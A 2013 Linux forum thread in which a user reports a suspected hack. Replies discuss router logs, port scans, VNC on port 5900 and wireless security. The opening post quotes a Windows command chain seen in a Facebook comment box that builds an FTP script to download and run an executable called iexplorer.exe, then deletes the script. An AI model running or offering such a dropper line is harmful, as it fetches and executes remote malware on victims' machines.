Author Topic: [SOLVED] Just been HACKED!  (Read 3195 times)

0 Members and 1 Guest are viewing this topic.

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
[SOLVED] Just been HACKED!
« on: August 19, 2013, 08:29:28 pm »
I was just browsing fb and had just finished posting a comment when all of a sudden in the usual comment entry box, I saw this appear...

del eq&echo open 0.0.0.0 14012 >> eq&echo user 30673 32497 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

I have my router log too if either MP or Mark wants to check it over?

« Last Edit: August 25, 2013, 08:14:53 pm by pooky2483 »

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline Melissa

  • Vintage geek
  • Hero Member
  • *****
  • Posts: 750
  • Karma: 0
  • Gender: Female
  • I am fairly new to Linux
    • View Profile
    • Awards
Re: Just been HACKED!
« Reply #1 on: August 19, 2013, 09:35:29 pm »
That's scary! Mark is coming back soon I think- hope he can sort it for you. Hackers are vile.
In a world without fences and walls, who needs Gates and Windows?

Using two computers- Peppermint on old HP laptop and Mint on new Dell netbook.

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • *****
  • Posts: 14302
  • Karma: 355
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
    • Awards
Re: Just been HACKED!
« Reply #2 on: August 19, 2013, 09:52:46 pm »
Bit of a sensationalist title, don't you think ;) ;)

Can't talk for how secure your Fekbook account is .. but that's targeted at Windows, hence the "del" commands, and mention of iexplorer.exe

Any attempt to install any software in Linux would meet with a major FAIL,  due to permissions and the execute bit being disabled .. nothing to worry about.

--
« Last Edit: August 19, 2013, 10:23:35 pm by Mark Greaves (PCNetSpec) »
WARNING: You are logged into reality as 'root'

logging in as 'insane' is the only safe option.

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
Re: Just been HACKED!
« Reply #3 on: August 19, 2013, 10:59:48 pm »
I know, I was laughing my ass off when I was reading it, thinking 'This ain't Window$ ya douche'
But in all seriousness, how did/can they get onto my PC if I've got router firewall on?

I've also noticed an unauthorised access to port 5900
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
And this;
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
And...
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43
I have noticed that there are 3 rules set in the UPnP list
http://img197.imageshack.us/img197/1839/as17.png

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • *****
  • Posts: 14302
  • Karma: 355
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
    • Awards
Re: Just been HACKED!
« Reply #4 on: August 20, 2013, 12:26:42 am »
Quote
how did/can they get onto my PC if I've got router firewall on?

They didn't .. if anything they *may* have compromised fekbook.

Quote
[LAN access from remote] from 190.54.209.86:2703 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19
[LAN access from remote] from 190.54.209.86:2683 to 192.168.1.2:5900, Monday, August 19,2013 20:09:19

Do you have VNC installed on the local PC with this IP address (192.168.1.2) .. or a port for VNC forwarded through your router ? .. port 5900 is *usually* used for VNC

and someone from an IP in Chile is attempting to connect.

If you're not running VNC or another service on that port that requires an open port for incoming connections .. disable/remove the port forward rule .. or set gufw to refuse incoming connections

Quote
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17

Unlikely to be a problem .. more likely the router misidentifying reset packets as a DoS attack, but in any case the router will be dropping them.

Quote
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43

Perfectly normal .. an application on your local PC (192.168.1.2) is requesting (through UPnP) that the router adjust ists setting to open a port for it .. the router is just logging the event for reference.
« Last Edit: August 20, 2013, 12:29:25 am by Mark Greaves (PCNetSpec) »
WARNING: You are logged into reality as 'root'

logging in as 'insane' is the only safe option.

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
Re: Just been HACKED!
« Reply #5 on: August 20, 2013, 01:27:18 am »
Quote
Do you have VNC installed on the local PC with this IP address (192.168.1.2) .. or a port for VNC forwarded through your router ? .. port 5900 is *usually* used for VNC

Maybe but I don't *knowingly* use it.

Quote
and someone from an IP in Chile is attempting to connect.

As it's not in my prot forwarding range then they're trying to hack me!

Quote
If you're not running VNC or another service on that port that requires an open port for incoming connections .. disable/remove the port forward rule .. or set gufw to refuse incoming connections

I can't remember installing VNC. What's it used for anyway and what do I do to completley remove all trace of it? And what's 'gufw'

Quote
[DoS Attack: RST Scan] from source: 10.13.224.242, port 9953, Monday, August 19,2013 20:15:17
Unlikely to be a problem .. more likely the router misidentifying reset packets as a DoS attack, but in any case the router will be dropping them.

That's OK then!

Quote
[UPnP set event: add_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:44
[UPnP set event: del_nat_rule] from source 192.168.1.2, Monday, August 19,2013 20:16:43

Perfectly normal .. an application on your local PC (192.168.1.2) is requesting (through UPnP) that the router adjust ists setting to open a port for it .. the router is just logging the event for reference.

Why would/does it do that?

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline salparadise

  • Full Member
  • ***
  • Posts: 184
  • Karma: 13
  • Gender: Male
    • View Profile
    • Awards
Re: Just been HACKED!
« Reply #6 on: August 20, 2013, 05:23:23 am »
A Windows using friend, who also uses f'book, now has a machine the screen of which goes white a few seconds after boot.
The hardware is fine as it boots off Linux disks and runs ok.
The last thing he was doing on it was using f'book.
Be silent, or say something better than silence.

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
Re: Just been HACKED!
« Reply #7 on: August 20, 2013, 12:09:49 pm »
Poor fellow!  ;)

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
Re: Just been HACKED!
« Reply #8 on: August 20, 2013, 03:24:32 pm »
Mark, I have got VNC installed...'Remote Desktop Viewer'

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • *****
  • Posts: 14302
  • Karma: 355
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
    • Awards
Re: Just been HACKED!
« Reply #9 on: August 20, 2013, 04:31:34 pm »
It's the server you want to remove, not so much the client

What's the output from:
Code: [Select]
dpkg -l | grep -i vnc
WARNING: You are logged into reality as 'root'

logging in as 'insane' is the only safe option.

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
Re: Just been HACKED!
« Reply #10 on: August 20, 2013, 05:08:46 pm »
pooky2483@pooky2483-ubuntu12:~$ dpkg -l | grep -i vnc
ii  libgtk-vnc-1.0-0                                  0.5.0-1ubuntu1                                       VNC viewer widget for GTK+2 (runtime libraries)
ii  libgtk-vnc-2.0-0                                  0.5.0-1ubuntu1                                       VNC viewer widget for GTK+3 (runtime libraries)
ii  libgvnc-1.0-0                                     0.5.0-1ubuntu1                                       VNC gobject wrapper (runtime libraries)
ii  libvncserver0                                     0.9.8.2-2ubuntu1                                     API to write one's own vnc server
ii  python-gtk-vnc                                    0.5.0-1ubuntu1                                       VNC viewer widget for GTK+2 (Python binding)
ii  vino                                              3.4.2-0ubuntu1.2                                     VNC server for GNOME
pooky2483@pooky2483-ubuntu12:~$

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
Re: Just been HACKED!
« Reply #11 on: August 21, 2013, 02:40:40 am »
I have just been looking through more of my router logs and found this entry...
[Internet connected] IP address: 82.24.4.95, Tuesday, August 20,2013 10:51:25
Brighton - http://open.mapquest.com/?q=50.8333,-0.1500

I've noticed further attempts...
[DoS Attack: TCP/UDP Chargen] from source: 173.242.115.176, port 33546, Tuesday, August 20,2013 20:12:29
Pennsylvania - http://open.mapquest.com/?q=41.4486,-75.7280

[DoS Attack: ACK Scan] from source: 50.98.118.30, port 57727, Wednesday, August 21,2013 00:38:12
British Columbia - http://open.mapquest.com/?q=49.2667,-122.7833

[DoS Attack: RST Scan] from source: 75.16.229.104, port 19215, Wednesday, August 21,2013 00:41:11
Indiana - http://open.mapquest.com/?q=38.0000,-87.5631

[DoS Attack: RST Scan] from source: 92.109.111.5, port 54188, Wednesday, August 21,2013 00:42:30
Netherlands - http://myip.ms/view/ip_addresses/1550675712/92.109.111.0_92.109.111.255

And someone seems VERY determined to get onto my network as they are trying every 20 - 40 seconds
[WLAN access rejected: incorrect security] from MAC address 2c:41:38:c1:4b:9b, Wednesday, August 21,2013 00:55:50

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • *****
  • Posts: 14302
  • Karma: 355
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
    • Awards
Re: Just been HACKED!
« Reply #12 on: August 21, 2013, 03:37:16 am »
STOP PANICKING

And if the router logs are causing you to panic .. STOP READING THEM

You WILL get your ports scanned regularly, unfortunately there are that many idiot script kiddies in the world automatically scanning random IP's for open ports .. but that's what your routers firewall is for.

And if you think whoever is attempting to access your wireless is going to crack your password if he only tries every 20 seconds, it'll take him forever .. but if it realy bothers you, enable MAC address filtering in your router, where the router only allows wireless adapters with MAC addresses you specify to connect.
(that isn't 100% proof against wireless cracking because someone with the correct knowledge could spoof your MAC address, but it does add another layer of security .. there is NO 100% safe wireless security except turning wireless OFF)

Trust me, even if the people who are scanning for open ports find one .. Linux has your back.

The best you can do for whichever neighbour is attempting to connect to your router wirelessly, is keep an eye out for the MAC adresses fo connected devices and if there's one connected that shouldn't be .. change the wireless WPA2 key .. but the worst he's liable to do is piggy back your internet connection until you notice him and change the password, it'll then take him ages again to crack the new one.

As I said .. STOP PANICKING or switch to ethernet cabling and disable wireless, which the only 100% sure fire way of protecting against wireless cracking.

If you're still worried, please read up on network security.
--
« Last Edit: August 21, 2013, 03:59:55 am by Mark Greaves (PCNetSpec) »
WARNING: You are logged into reality as 'root'

logging in as 'insane' is the only safe option.

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
Re: Just been HACKED!
« Reply #13 on: August 21, 2013, 10:35:14 am »
I'm NOT panicking.
If I was I'd be begging and pleading for help on how to stop these people from doing stuff. I'm just commenting on who and what is happening.


I'm actually having fun mapping them on Google :-)
« Last Edit: August 21, 2013, 12:59:13 pm by pooky2483 »

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

Offline pooky2483

  • Hero Member
  • *****
  • Posts: 1627
  • Karma: 0
  • Gender: Male
  • Slowly getting the hang of it.
    • View Profile
    • Get your FREE Ubuntu stickers here. I'm the UK address
    • Awards
Re: Just been HACKED!
« Reply #14 on: August 21, 2013, 01:54:53 pm »
I need to disable VNC as someone managed to get on my PC through port 5900
[LAN access from remote] from 50.116.40.245:43314 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[LAN access from remote] from 50.116.40.245:43232 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55
[LAN access from remote] from 50.116.40.245:43218 to 192.168.1.2:5900, Wednesday, August 21,2013 12:19:55

Kubuntu 12.04LTS 64bit|KDE 4.13.2|QT 4.8.6|Linux 3.2.0-70-generic|M3A76-CM|BIOS 2101|AMD PhenomII X4 965 3400+|Realtek RTL8168C(P)|8111C(P) PCI-E Gigabit Ethernet NIC|NVIDIA 128MB GeForce6200 Turbocache|8.0GB Single-Channel DDR2|

 


SimplePortal 2.3.3 © 2008-2010, SimplePortal